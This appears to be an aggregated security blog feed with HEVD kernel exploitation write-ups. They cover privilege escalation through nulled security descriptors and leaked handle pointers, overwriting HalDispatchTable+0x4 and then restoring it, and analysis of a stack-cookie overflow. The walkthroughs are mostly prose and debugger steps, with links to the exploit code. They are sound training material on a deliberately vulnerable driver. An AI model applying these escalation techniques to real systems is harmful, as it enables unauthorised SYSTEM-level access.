    UPDATE: This simple C++ file can be used to modify the Win32 SCM APIs to use Kerberos for local authentication.

    HackSys Extreme Vulnerable Driver — Arbitrary Write NULL (New Solution)

    18 November 2021 at 19:23

    HackSys Extreme Vulnerable Driver — Arbitrary Write NULL (New Solution)

A simple (not stealthy) method utilizing “NtQuerySystemInformation” for “Arbitrary Write NULL” vulnerabilities

Today we’re going to take a deep look at an interesting exploitation technique using the “NtQuerySystemInformation” system call in order to achieve “LPE (Local Privilege Escalation)” through “HEVD (HackSys Extreme Vulnerable Driver)”. The following content only shows a possible and functional (but unreliable) technique and methodology for exploiting this common vulnerability type (“Arbitrary Write NULL”) in most vulnerable drivers (in case you don’t have certain tools available to exploit them). Also, we’ll not cover how to install and configure kernel debugging or “HEVD IOCTL” communication; this write-up is about what I did and how I worked around the problem to get a solution (though the knowledge of other people influenced me along the way), and finally the results of the final script. Hope everyone enjoys! =)

    Introduction

First of all, we need to talk about what an “Arbitrary Write NULL” vulnerability is and, from a kernel perspective, what is possible to do with it in order to achieve “LPE” in our simple “cmd.exe” session from “ring3 (user-land)”.

In short, an “Arbitrary Write NULL” is much like an “Arbitrary Write” vulnerability; the difference between them is that the first one only allows you to “write->[0x00000000]” to whatever address/pointer you choose, while the second one allows you to define an explicit “Write-What-Where”, allowing things like write->[0xdeadbeef], meaning that you have control over the value that an address/pointer will be overwritten with (0xdeadbeef instead of only 0x00000000). Below we are going to take a deep look into the vulnerable HEVD driver function, dissect it and understand what is happening.

    [HEVD]-TriggerWriteNull

    HEVD - https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
The TriggerWriteNull function, which handles the user buffer and checks whether it resides in ring3 (user-land).
Source code of the vulnerable driver function

As you can see here, when compiled with “#ifdef SECURE” (which it is not), the “ProbeForWrite()” function would verify and confirm that our user input buffer is located in “ring3”; otherwise our input buffer will be nullified without proper security checks.

Reverse engineering the vulnerable function

As commented, the “[edi]” register is overwritten with “0x00000000” from the “[ebx]” register, which occurs when the code was compiled without “#ifdef SECURE” defined.

Since the IOCTL driver connection is predefined, we can test it and see that the first 4 bytes of our user buffer “(shellcode_ptr)” are about to be nullified with “0x00000000”.

Placing breakpoints on strategic addresses and running it.
    Reading important addresses using WinDBG cmd

After the script runs and the breakpoint hits, we can clearly see that the “[edi]” value contains the address of the pointer to our user buffer “(shellcode_ptr -> 0x00500000)”.

    Reading important addresses using WinDBG cmd

As an example, our “shellcode” buffer stores a piece of “x86 assembly” code to escalate our permissions. In its first “4 bytes” you can see the initial part of our “shellcode”. Ignoring the code located there for now, we’re only looking at the “0xa16460cc” address.

Here you can see the vulnerability, since ebx=0x00000000 is overwriting our value inside the user buffer, eax=0xa16460cc.

The problem here is obvious: as a simple user “(ring3)”, whatever address we send will be nullified; no matter what, it will end up “NULL”.

Having said all that, we know that we can only write “NULL” bytes to an address/pointer of our choosing, and we need to do some magic to achieve LPE from there, but… how can we do that? Let’s talk about DACLs & security descriptors.

DACL & Security Descriptor

First of all, what are a “DACL” and a “security descriptor”? How can they be exploited using “Arbitrary Write NULL” vulnerabilities?

    According to https://networkencyclopedia.com/discretionary-access-control-list-dacl/

    What is DACL (Discretionary Access Control List)?
    A DACL stands for Discretionary Access Control List, in Microsoft Windows family, is an internal list attached to an object in Active Directory that specifies which users and groups can access the object and what kinds of operations they can perform on the object. In Windows 2000 and Windows NT, an internal list attached to a file or folder on a volume formatted using the NTFS that has a similar function.
    How DACL works?
    In Windows, each object in Active Directory or a local NTFS volume has an attribute called Security Descriptor that stores information about
    The object’s owner (the security identifier or the owner) and the groups to which the owner belongs.
    The discretionary access control list (DACL) of the object, which lists the security principals (users, groups, and computers) that have access to the object and their level of access.
    The system access control list (SACL), which lists the security principals that should trigger audit events when accessing the list.

Basically, a “DACL” is a list stored inside an object’s “security descriptor” (we will dig deeper into this soon). This list is configured to filter which operations on an object (files, processes, threads, etc.) should be allowed or denied for specific users, groups, or computers. Hard to understand? Let me show it in the “Windows UI”. =)

Maybe this image is familiar to you, right? This dialog is one of various places where you can manage “DACLs & security descriptors” easily (without knowing that they actually exist).

As we can see, it isn’t hard to understand what it is and why it was created. The thing is, what internally defines which permissions a user has on an object? Which objects are configured in the “DACL” to be filtered? Let’s have a deep look into “Windows Internals” and its “structs”.

First of all, let’s take a look at the “WinDBG” process list.

    WinDBG processes list

When we list our Windows processes in “WinDBG”, we can see that every process follows the same pattern, only with different values or address ranges. In the image above, you can notice a marked address, “0x856117c8”; this address represents a Windows object, and this object has some important properties which define the process name, permissions, process IDs, handles, etc. (I won’t expand on this, so take it just as a simple recap.)

An interesting thing we can explore at the moment is none other than the “nt!_OBJECT_HEADER” struct. This struct has literally the tools we need to start our attack.

Getting the nt!_OBJECT_HEADER address of the System (PID:4) process
Viewing information about the System (PID:4) process header

As the image above shows, we simply dissect our process using the “nt!_OBJECT_HEADER” struct, which gives us information about what is located in our object. It’s also important to notice that “nt!_OBJECT_HEADER” only covers the offsets before “nt!_EPROCESS”, which means the “nt!_EPROCESS” range starts after those offsets.

But what about the SecurityDescriptor?

SecurityDescriptor pointing to 0x8c005e1f

Another interesting thing is that our SecurityDescriptor “(0x856117b0+0x014)” points to the address “0x8c005e1f”, meaning that something is happening here, and this address has some relationship to the “DACL & security descriptor” implementation.

Now let’s have a deep look at this specific address, “0x8c005e1f”.

Visualizing the SecurityDescriptor struct of the System (PID:4) process

Using the previous target SecurityDescriptor address with the WinDBG command “!sd” (after a simple bit calculation), we are now able to understand much better how its implementation is configured in Windows internals. So, do those marked values remind you of something? Yes, that’s right: those marks are the user information stored in the process. In the image below, we can compare the two pieces of DACL information.

    SYSTEM and DAML users (colors compared to last image)

Comparing these two images, we notice that the “SYSTEM” and “DAML” users relate to the other image about the security descriptor “(Windows Internals)”. It’s an example (not rigorous) of how we can compare these two values.

Knowing that, and understanding that we can nullify any “ring0 (kernel)” address as a simple user, let’s try to make the SecurityDescriptor address “(0x856117b0+0x014)” point to “NULL” “(0x00000000)” and see what happens!

SecurityDescriptor pointing to 0x8c005e1f
Nullifying the SecurityDescriptor pointer
Results after nullification of the pointer

OK! Now the “System.exe (PID:4)” process has its SecurityDescriptor pointer nullified. Let’s try to resume our “VM snapshot”.

You may not be able to read it, but it says “Do you want to close the [System] process?”
    ERROR: DCOM server process launcher service terminated unexpectedly
Wait, what happened? We closed the [System.exe] process manually? Without user permissions? Using Task Manager?

Yes! Only “nt authority/SYSTEM” should have permission to close this process, so how could a simple user “BSOD” the whole system? The magic behind this exploitation is a well-known technique which nullifies the security descriptor of SYSTEM processes; this technique is widely used in “LPE exploits” since it effectively removes all permission checks on the target processes. In short, from WinDBG we manually nullified the pointer which holds the permission information (the SecurityDescriptor), meaning that “anyone” can now “write/read/execute” in this process. =)

But there’s a problem here. We now understand what we need to do in order to build our exploit, but I ask you: how can we identify “SYSTEM” process objects from simple “ring3 (user-land)”?

    WinDBG processes list

In the image above, since we’re looking at those addresses from the WinDBG screen in “ring0 (kernel mode)”, we clearly see the object there; but we also need to know that those values are not accessible (and are unpredictable) to our simple user in “ring3 (user-land)”. These addresses are re-randomized every time “Windows 7” reboots “(Address Space Layout Randomization, or ASLR)”; this mitigation defeats every attempt to work with a static address. Lastly, while the randomization itself is unpredictable (in most of my tests), these objects only randomize through the “0x85xxxxxx” to “0x87xxxxxx” range, and I actually don’t know whether a bypass of this randomization (from ring3) exists.

    So, what to do next?

    NtQuerySystemInformation - Handle Leaking Attack

As mentioned before, it isn’t possible to exploit this directly from “ring3 (user-land)” due to the many permission restrictions placed by our target “operating system (Windows 7)”. So what can we do to bypass these restrictions? The answer is the “NtQuerySystemInformation” WinAPI call.

“NtQuerySystemInformation” is by design one of various security flaws that “Microsoft” considers merely a “feature” from a user’s perspective. The biggest problem with this “WinAPI call” is that it’s configured by default to accept user calls (including undocumented information classes) which are parsed and answered with ring0 (kernel mode) information, resulting in a leak of SYSTEM addresses/pointers. This “WinAPI call” is a well-known artifice for “memory leaking attacks”, since it allows an attacker to know exactly which pointers are important and to elaborate a better methodology for exploiting the target vulnerability (in our case WriteNULL).

But how is it possible to leak this information from ring3?

Before we start looking deeper into the vulnerable (feature) calls, we should first look at the definition of “handles” and why we need to focus on them.

According to: https://stackoverflow.com/questions/902967/what-is-a-windows-handle

    It’s an abstract reference value to a resource, often memory or an open file, or a pipe.
    Properly, in Windows, (and generally in computing) a handle is an abstraction which hides a real memory address from the API user, allowing the system to reorganize physical memory transparently to the program. Resolving a handle into a pointer locks the memory, and releasing the handle invalidates the pointer. In this case think of it as an index into a table of pointers… you use the index for the system API calls, and the system can change the pointer in the table at will.
    Alternatively a real pointer may be given as the handle when the API writer intends that the user of the API be insulated from the specifics of what the address returned points to; in this case it must be considered that what the handle points to may change at any time (from API version to version or even from call to call of the API that returns the handle) — the handle should therefore be treated as simply an opaque value meaningful only to the API.

In short, “handles” are used to create and manage references to objects (open files, APIs, pipes) in the “operating system (OS)”. These handles carry a bunch of information about their objects, one piece of which is a pointer. Basically, “handles” are backed by pointers, but do you know the best part? It’s the possibility of “leaking” these pointers from “ring3 (user-land)”, and that’s where we need to look deeper.

Knowing that, “NtQuerySystemInformation” affords a lot of interesting calls; on top of that, we have an undocumented information class named “SystemExtendedHandleInformation”, which works with the following structs:

    SYSTEM_HANDLE_TABLE_ENTRY_INFO
    SYSTEM_HANDLE_INFORMATION

These structs will help us leak “handle pointers”, and that’s how the magic starts.

Utilizing these flawed-by-design calls, let me dump some handle data from a “ring3 (user-mode)” perspective and see what happens.

Piece of code to leak handle data
This part loops over all handles and gets their data
Script running and leaking pointers from ring3 (user-land) (PID:444)
Script running and leaking pointers from ring3 (user-land) (PID:1240)
[11931] leaked pointers found

As you can see, as a simple user we can actually leak a lot of pointers and data. The best part is that one of those pointers corresponds to our “PROCESS object”; remember?

    WinDBG processes list

This is it, that’s the trick! But there’s a problem. Given that mitigations such as “ASLR” are enabled by default, how do we know which addresses, PIDs and handle values are the right ones in order to find the one containing our “PROCESS object” pointer?

The answer to this question is: “I don’t know, but there’s a method (really not stealthy) which works as well!” This method was discovered after testing, under “ASLR randomization”, which processes (containing useful pointers) would crash after being nullified through the exploitation technique.

After some tests, it was noticed that if we make the “lsass.exe” PID the only target whose handles get nullified, the “operating system (OS)” doesn’t crash (I assume that’s because “lsass.exe” isn’t a process that holds many handles for “SYSTEM internals”, only ones related to permissions and similar things). After all, with the “lsass.exe” handle pointers nullified, clearly not just one process will be open to “write/read/execute”, but many. That’s why I don’t recommend this technique for real-world exploitation: it isn’t safe (or stealthy), and nullifying “handles” could make the operating system crash and reboot.

Source code modified to filter only handles from the “lsass.exe” PID

The thing is, once the “SYSTEM processes” grant access to “anyone”, the final part is “shellcode injection” into a SYSTEM target process, and that’s what we do with “winlogon.exe”. This process runs with SYSTEM permissions (and now, after the nullify attack, with “write/read/execute” open to us).

So, putting it all together, this is how it looks. =D

Nullifying the SecurityDescriptor pointers of “lsass.exe” handles and injecting the “LPE shellcode” into the “winlogon.exe” process.

After the exploit runs, we finally get our “nt authority/SYSTEM cmd.exe shell”; nothing crashed and all processes keep working without issues.

My final consideration for this write-up is that I didn’t find any reliable solution for the WriteNULL challenge, only one which uses another driver vulnerability in order to leak a pointer address (see references), meaning this exploit may be the only one on the internet utilizing this technique (really, no one wants to do this). =(

So, it was kind of fun, and I hope everyone enjoyed this write-up. =P

    Final Exploit link:
    https://github.com/w4fz5uck5/3XPL01t5/tree/master/OSEE_Training/HEVD_exploits/windowsx86/%5BHEVD%5D-WriteNULL
    References:
    https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/HackSysExtremeVulnerableDriver.h
https://github.com/daem0nc0re/HEVD-CSharpKernelPwn/blob/master/HEVD_Win7x86/WriteNull/Program.cs
http://bprint.rewolf.pl/bprint/?p=1683
https://github.com/ZecOps/CVE-2020-0796-LPE-POC/blob/master/poc.py
    https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/windows-debugging-and-exploiting-part-4-ntquerysysteminformation/

    An in-depth look at hacking back, active defense, and cyber letters of marque

    17 November 2021 at 19:16

There has been much discussion in cyber security about the possibility of enabling the private sector to engage in active cyber defense, or colloquially “hacking back”.

    The post An in-depth look at hacking back, active defense, and cyber letters of marque appeared first on MalwareTech.

    Improving the write-what-where HEVD PoC (x86, Win7)

    17 October 2021 at 20:12

    Introduction

This one is about another HEVD exercise (look here to see my previous HEVD post): the arbitrary write (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/ArbitraryWrite.c). The main reason I decided to write up my experience with it is that it instantly occurred to me that the official exploitation process, used both in the original PoC and described here, leaves the kernel in an unstable state with a high probability of a crash anytime after the exploit is run. So, this post is more about the exploitation technique, the problem it creates and the solution it calls for, than about the vulnerability itself. It also occurred to me that doing HEVD exercises thoroughly (understanding exactly what happens and how) is quite helpful in improving one's general understanding of how the operating system works.

    When it comes to stuff like setting up the environment, please refer to my earlier HEVD post. Now let's get started.

    The vulnerability

This one is a vanilla write-what-where case: code running in kernel mode performs a write of an arbitrary (user-controlled) value to an arbitrary (user-controlled) address. On an x86 system (we keep using these for basic exercises since they are easier and debugger output with 32-bit addresses is more readable), it usually boils down to being able to write an arbitrary 32-bit value to an arbitrary 32-bit address. However, it is also usually possible to trigger the vulnerability more than once (which we will do in this case, by the way, just to fix the state of the kernel after privilege escalation), so virtually we control data blocks of any size, not just four bytes.

    First of all, we have the input structure definition at https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/ArbitraryOverwrite.h - it's as simple as it could be, just two pointers:

    Then, we have the TriggerArbitraryWrite function in https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/ArbitraryWrite.c (screenshot below). First, we have a call to ProbeForRead on the input pointer, to make sure that the structure itself is located in user space (both ProbeForRead and ProbeForWrite methods throw an access violation exception if the address provided turns out to belong to the kernel space address range). Then, What and Where values held by the structure (note that these are both pointers and there are no additional checks here whether the addresses those pointers contain belong to kernel or  user space!) are copied into the local kernel mode function variables:

    Then, we have the vulnerable write-what-where:

Now, let's see what this C code actually looks like after it's compiled (disassembly view in windbg):

    Exploitation

    So, as always, we just want to run our shellcode in kernel mode, whereas the only thing our shellcode does is overwriting the security token of our exploit process with the one of the SYSTEM process (token-stealing shellcode).  Again, refer to the previous blog post https://hackingiscool.pl/hevd-stackgs-x86-win7/ to get more details on the shellcode used.

    To exploit the arbitrary write-what-where to get our shellcode executed by the kernel, we want to overwrite some pointer, some address residing in the kernel space, that either gets called frequently by other processes (and this is what causes trouble post exploitation if we don't fix it!) or is called by a kernel-mode function that we can call from our exploit process (this is what we will do to get our shellcode executed). In this case we will stick to the HalDispatchTable method - or to be more precise, HalDispatchTable+0x4. The method is already described here https://poppopret.blogspot.com/2011/07/windows-kernel-exploitation-basics-part.html (again, I recommend this read), but let's paraphrase it.

    First, we use our write-what-where driver vulnerability to overwrite 4 bytes of the the nt!HalDispatchTable structure (nt!HalDispatchTable at offset 0x4, to be exact). This is because the NtQueryIntervalProfile function - a function that we can call from user mode - results in calling nt!KeQueryIntervalProfile (which already happens after switching into kernel mode), and that function calls whatever is stored at nt!HalDispatchTable+0x4:

So, the idea is to first exploit the arbitrary write to overwrite whatever is stored at nt!HalDispatchTable+0x4 with the user-mode address of our shellcode, then call NtQueryIntervalProfile only to trick the kernel into executing it via the call through HalDispatchTable+0x4. It works like a charm on Windows 7 (kernel-mode execution of code located in a user-mode buffer, as no SMEP is in place).

    The problem

The problem is that nt!HalDispatchTable is a global kernel structure, which means that once we tamper with it, the change stays there for any other program that refers to it (e.g. by calling NtQueryIntervalProfile). And it WILL affect whatever we do while enjoying our SYSTEM privileges, because it WILL crash the entire system.

Let's say the buffer holding our shellcode in our user-mode exploit is at 00403040. If we overwrite the original value of nt!HalDispatchTable+0x4 with it, that shellcode will only be reachable, and thus callable, while the current process being executed is our exploit. Once the scheduler switches the current CPU core to another process, in the context of that process the user-mode virtual address 00403040 will either be invalid (it won't fall into any committed/reserved virtual address range within that process's address space) or it will be valid as an address but mapped to a different physical page, which means it will hold something completely different from our shellcode. Remember, each process has its own address space, separate from all other processes, whereas the address space of the kernel is global for the entire system. Therefore every kernel-space address makes sense to the entire system (kernel and all processes), whereas our shellcode at 00403040 is only accessible to our exploit process AND the kernel, but only when the process currently being executed is our exploit. The same address referred to from a different process context will be invalid or point at something completely different.

    So, after we tamper HalDispatchTable+0x4 by overwriting it with the address of the shellcode residing in the memory of the current process (our exploit) and call NtQueryIntervalProfile to get the shellcode executed, our process should now have SYSTEM privileges (and so will any child processes it spawns, e.g. a cmd.exe shell).

    Therefore, if any other process in the system, after we are done with privilege escalation, calls NtQueryIntervalProfile, it will as well trick the kernel into trying to execute whatever is located under the 00403040 address. But since the calling process won't have this address in its working set or will have something completely different mapped under it, it will lead to a system crash. Of course this could be tolerated if we performed some sort of persistence immediately upon the elevation of privileges, but either way as attackers we don't want disruptions that would hurt our customer or potentially tip the defenders off. We don't want system crashes.

This is not an imaginary problem. Right after running the initial version of the PoC (which I put together based on the official HEVD PoC), all of a sudden I saw this in windbg:

Obviously whatever was located at 0040305b at the time (000a - add byte ptr [edx],cl) was no part of my shellcode. So I did a quick check to see which process caused this, by issuing the !vad command to display the current process VADs (Virtual Address Descriptors), basically the memory map of the current process, including the names of files mapped into the address space as mapped sections, which includes the path to the original EXE file:

    One of svchost.exe processes causing the crash by calling HalDispatchTable+0x4

One more interesting thing: if we look at the stack trace (two screenshots above), the call through HalDispatchTable+0x4 did not originate from the KeQueryIntervalProfile function, but from nt!EtwAddLogHeader+0x4b. This suggests that HalDispatchTable+0x4 is called from more places than just NtQueryIntervalProfile, adding to the probability of such a post-exploitation crash.

    The solution

So, the obvious solution that comes to mind is restoring the original HalDispatchTable+0x4 value after exploitation. The easiest approach is to simply trigger the vulnerability again, with the same "where" argument (HalDispatchTable+0x4) and a different "what" argument (the original value instead of the address of our user-mode shellcode).

Now, to be able to do this, first we have to know what that original value of nt!HalDispatchTable+0x4 is. We can't read it in kernel mode from our shellcode, since we need to overwrite it first in order to get the shellcode executed in the first place. Luckily, I figured out it can be calculated from information attainable through regular user-mode execution (again, keep in mind this is only directly relevant to the old Windows 7 x86 I keep practicing on; I haven't tried this on modern Windows yet, where SMEP and probably CFG would be our main challenges).

    First of all, let's see what that original value is before we attempt any overwrite. So, let's view nt!HalDispatchTable:

The second DWORD in the memory block at nt!HalDispatchTable contains 82837940, which definitely looks like a kernel-mode address. It has to be: after all, it is routinely called from other kernel-mode functions, as code, so it must point at kernel-mode code. When I inspected it with the dt command, windbg resolved it to HaliQuerySystemInformation. Running the disassembly view command uu on it revealed the full symbol name (hal!HaliQuerySystemInformation) and showed that there is in fact a function there (just from the first few assembly lines we can see a normal function prologue).

    OK, great, so we know that nt!HalDispatchTable+0x4, the pointer we abuse to turn arbitrary write into a privilege escalation, originally points to a kernel-mode function named hal!HaliQuerySystemInformation (which means the function is a part of the hal module).

    Let's see more about it:

    Oh, so the module name behind this is halacpi.dll. Now we both have the function name and the module name. Based solely on this information, we can attempt to calculate the current address of hal!HaliQuerySystemInformation dynamically. To do this, we will require the following two values:

    1. The current base address the halacpi.dll module has been loaded (we will get it dynamically by calling NtQuerySystemInformation from our exploit).
2. The offset of the HaliQuerySystemInformation function within the halacpi.dll module itself (we pre-calculate this value and hardcode it into the exploit code, so it is version-specific). We can calculate the offset in windbg by subtracting the current base address of the halacpi.dll kernel-mode module (e.g. taken from the lm Dvm hal command output) from the absolute address of the hal!HaliQuerySystemInformation function as resolved by windbg. We can also confirm the same offset with static analysis: load that version of halacpi.dll into Ghidra, download and load the symbols file, find the function's static address within the binary, and subtract the preferred module base address from it.

    Below screenshot shows the calculation done in windbg:

    Calculating the offset in windbg

    Below screenshots show the same process with Ghidra:

    Preferred image base - 00010000
    Finding the function (symbols must be loaded)
    HaliQuerySystemInformation static address in the binary (assembly view)

    Offset calculation based on information from Ghidra: 0x2b940 - 0x10000 = 0x1b940.

So, during runtime, we need to add 0x1b940 (for this particular version of halacpi.dll; remember, other versions will most likely have different offsets) to the dynamically retrieved load base address of halacpi.dll, which we get by calling NtQuerySystemInformation and iterating over the buffer it returns (see the PoC code for details). The same function, NtQuerySystemInformation, is used to calculate the runtime address of HalDispatchTable, the "where" in our exploit (as in the original HEVD PoC code and many other exploits of this sort). In all cases NtQuerySystemInformation is called to get the current base address of the ntoskrnl.exe module (the Windows kernel). Then, instead of using a hardcoded (fixed) offset to get HalDispatchTable, a neat trick with LoadLibraryA and GetProcAddress is used to calculate it dynamically at runtime (see the full code for details).

The reason I could not reproduce this fully dynamic approach of calculating the offset from the base (calling LoadLibraryA("halacpi.dll") and then GetProcAddress("HaliQuerySystemInformation")) to calculate hal!HaliQuerySystemInformation, and used a hardcoded, manually precalculated 0x1b940 offset instead, is that the HaliQuerySystemInformation function is not exported by halacpi.dll, whereas GetProcAddress only works for functions that have corresponding entries in the DLL Export Table.

    Full PoC

    The full PoC I put together can be found here: https://gist.github.com/ewilded/4b9257b552c6c1e2a3af32879f623803.

    nt/system shell still running after the exploit process's exit
    The original HalDispatchTable+0x4 restored after exploit execution

    HEVD StackOverflowGS x86 Win7 - exploitation analysis

    5 October 2021 at 06:00

    Introduction

This post is about kernel-mode exploitation basics under Windows. It operates on the assumption that the reader is familiar with terms such as process, thread, user and kernel mode, and the difference between the user and kernel mode virtual address ranges. One could use this post as an introduction to HEVD.

Even though I came across at least one good write-up about Hacksys Extreme Vulnerable Driver StackOverflowGS (https://klue.github.io/blog/2017/09/hevd_stack_gs/, highly recommended), after reading it I still felt I did not understand the entire exploitation process (I did not notice the link to the source code at the time :D), so I fell back on the PoC provided by HEVD (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/StackOverflowGS.c), analyzed it and learned a few things; now I am just sharing my insights and tips.

    Setup

    There are numerous resources on how to set up Windows kernel debugging and install HEVD (e.g. https://hshrzd.wordpress.com/2017/05/28/starting-with-windows-kernel-exploitation-part-1-setting-up-the-lab/ and https://hshrzd.wordpress.com/2017/06/05/starting-with-windows-kernel-exploitation-part-2/).

    I personally prefer using my host OS as the debugger and a VirtualBox VM as the debuggee (Windows 7, x86).

    VM setting of the serial port for debugging

    To attach to the VM, I run the following command (make sure windbg.exe is in your %PATH%):

windbg -k com:pipe,port=\\.\pipe\com_1,resets=0,reconnect

    When successfully attaching a debuggee, windbg output will look like this:

I myself have experienced issues when rebooting the debuggee with windbg running (which happened a lot, with all the crashes resulting from my exploitation attempts): it just didn't want to attach to the named pipe, so there was no connection between windbg and the debuggee. Trying to attach to a VM that was already running didn't work this way either. I found that everything works as it should when I first boot the VM and then, once the OS loading progress bar pops up, run the command to spawn windbg and make it connect to the named pipe created by VirtualBox.

    Also, don't forget to load the symbols, e.g.:

.sympath C:\Users\ewilded\HACKING\VULNDEV\kernel\windows\HEVD\HEVD.1.20\drv\vulnerable\i386;SRV*C:\Symbols*https://msdl.microsoft.com/download/symbols

    The vulnerability

    StackOverflowGS (code here https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/BufferOverflowStackGS.c) is a vanilla stack-based buffer overflow, just like StackOverflow (code here https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/BufferOverflowStack.c). The only difference is that in this case stack smashing is detected via a stack canary/stack cookie (a good introduction to the subject can be found here).

    All HEVD exercises have the same structure and are all called in the same manner.

Whenever a user wants to interact with the driver, they send it a data structure: an IRP (https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/i-o-request-packets). This data structure is our malicious input vector.

    On line 128 of the HackSysExtremeVulnerableDriver.c main driver source file, we can see that IrpDeviceIoCtlHandler function is assigned to IRP_MJ_DEVICE_CONTROL packets:

    That function can be found in the same file, starting with line 248:

    Depending on the IOCTL code (an unsigned long integer argument, part of the IRP), IrpDeviceIoCtlHandler runs a different function:

    Constants like HEVD_IOCTL_BUFFER_OVERFLOW_STACK are numeric variables predefined in HackSysExtremeVulnerableDriver.h.

    So each exercise has its corresponding function with "IoctlHandler" suffix in its name (BufferOverflowStackIoctlHandler, BufferOverflowStackGSIoctlHandler and so on). Let's see what this function looks like in our case (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/BufferOverflowStackGS.c):

    So there is another function, named TriggerBufferOverflowStackGS, run from BufferOverflowStackGSIoctlHandler. So the function call tree, starting from IrpDeviceIoCtlHandler, is now:

    Finally, the function is pretty simple too:

    UserBuffer is a pointer to the user mode memory block (valid in the address space of the process that is currently interacting with the driver). Kernel mode code will be reading data from this location.

    Size is an integer telling HEVD how many bytes we want it to read from the UserBuffer memory block - and write to kernel memory, starting at KernelBuffer. KernelBuffer is a local variable (defined on line 72 visible in the screenshot above), so it resides on the stack.

    Both the UserBuffer pointer and the Size are delivered with the IRP and controlled by the user mode program that created it and triggered an interrupt to communicate with this driver (we'll get to that code too, shortly).

    Then we get to the bottom of this:

So basically it's a vanilla stack-based buffer overflow: we can overwrite KernelBuffer with Size bytes from UserBuffer (and we control both UserBuffer and Size).

    Let's set up a breakpoint in windbg, at HEVD!TriggerStackOverflowGS:

    By listing the breakpoint (bl) we can see the current kernel mode address of the function (87e3f8da), which will vary between platforms and system boots.

Viewing the disassembly of the entire function, we can notice two important points in the code:

The first is our vulnerable memcpy call; the second is __SEH_epilog4_GS, the function responsible for checking the saved stack canary and preventing a normal return if the stack is detected to be smashed (the cookie doesn't match), aimed at preventing exploitation.

Naturally, a breakpoint at 87e3f964 e871c8ffff      call    HEVD!memcpy (87e3c1da) would be more precise, as we can see directly what the stack buffer looks like before and after memcpy executes. Let's set it:

    By listing the existing breakpoints again, we can see that windbg neatly displays both addresses using properly resolved symbols, so our second breakpoint set using the address 87e3f964 got nicely resolved to HEVD!TriggerStackOverflow+0x8a. I personally prefer to save these, so I can use them later when running again, just to remember where the actual breakpoint I am interested in is.

Now we need to interact with the driver in order to see how the buffer we supply is stored on the stack, what we overwrite, and how the error conditions we cause will differ depending on the buffer size.

    For this purpose, I assembled a simple piece of C code based on other existing HEVD PoCs (I use Dev-C++) https://gist.github.com/ewilded/1d015bd0387ffc6ee1284bcb6bb93616:

• it offers two payload types: a string of A's or up to 3072 bytes of a de Bruijn sequence,
    • it asks for the size argument that will be sent over to the driver.

The screenshot below demonstrates running it to send a 512-byte buffer filled with 'A':

    At this point we should hit the first breakpoint. We just let it go (g) and let it hit the second breakpoint (just before memcpy):

    Let's see the stack:

    Now, let's just step over once (p), so we get to the next instruction after the memcpy call, and examine the stack again:

So we can clearly see our 512-byte buffer filled with 'A'. At this point there is no buffer overflow.

Now, the next value on the stack, right after that buffer (in this case 070d99de), is the stack cookie.

    By the way, this is a good opportunity to notice the call stack (function call tree):

    We can see that our saved return address is 87e3f9ca (HEVD!TriggerStackOverflowGS+0x8f)(red). The SEH handler pointer we will overwrite is sitting between the stack cookie and the saved RET (green):

If we let it run further (g), we can see nothing happens and fuzz.exe returns:

Good: as the buffer was 512 bytes, there was no overflow and everything returned cleanly.

    Now, let's see what happens when we increase the buffer size by just one:

    First two breakpoints hit, nothing to see yet:

    Now, let's step over (p or F10) and see the stack again. This time we overwrote the stack cookie, by one byte (0d9bb941):

    Now, let's let the debuggee go and see what happens (also, note the !analyze -v link generated in windbg output - click on it/run the command to see more details about the crash):

    We end up with a fatal error 0x000000f7 (DRIVER_OVERRAN_STACK_BUFFER), which means that the __SEH_epilog4_GS function detected the change in the cookie saved on the stack and triggered a fatal exception.

    Just as expected.

It is important to pay close attention to the error code, especially in this case: 0x000000f7 (DRIVER_OVERRAN_STACK_BUFFER) looks a lot like 0x0000007f (DOUBLE_TRAP). Distinguishing between these two (easy to mix up) is crucial while developing this exploit. The first one indicates that the stack cookie was overwritten and that __SEH_epilog4_GS executed and detected the tampering, preventing exploitation. The second one basically means that an exception was triggered while an exception handler was already executing; in other words, after one exception, the code handling that exception encountered another exception. We can trigger an access violation by providing a sufficiently large value of the Size argument in the IRP, causing the kernel-mode memcpy call to either read beyond the page of the user-mode process working set, or write beyond the kernel stack, depending on which happens first.

    Exploitation approach

    When it comes to stack cookies, there are several bypass scenarios.

The stack cookie could be leaked by exploiting another vulnerability (chaining, just like in one of my previous write-ups) and then used in the payload to overwrite the canary with its original value, making the entire stack smashing invisible to the cookie-checking routine called in the function's epilogue.

    Another chaining method involves overwriting the process-specific pseudo-random value of the current cookie in the process memory, wherever it is stored (depending on the OS and compiler).

And then finally there is the third exploitation approach, abusing the fact that exception handlers are executed before the stack cookie is checked. Sometimes it is possible to abuse exception handling code, in this case a SEH handler pointer, which is also stored on the stack in a location we can overwrite. The idea is to abuse the memory corruption vulnerability so that we overwrite a pointer to an exception handler and then trigger an exception within the same function, before the stack-checking routine in the function's epilogue executes. This way we redirect execution to our payload (our shellcode), which first elevates our privileges (as it's a local kernel EoP exploit), then returns to the parent function (the function that called the one we are exploiting, the parent in the call stack/call tree), without the stack cookie-checking routine ever running.

    Again, please refer to https://dl.packetstormsecurity.net/papers/bypass/defeating-w2k3-stack-protection.pdf for more details on the general subject of defeating stack cookies under Windows.

    HEVD official PoC

    The tricky part in this exercise is that we have to do both things with one input (one device interaction, one IRP with a buffer pointer and size, one call of the TriggerStackOverflowGS function); overwrite the pointer to the SEH exception handler AND cause an exception that the handler would be used for.

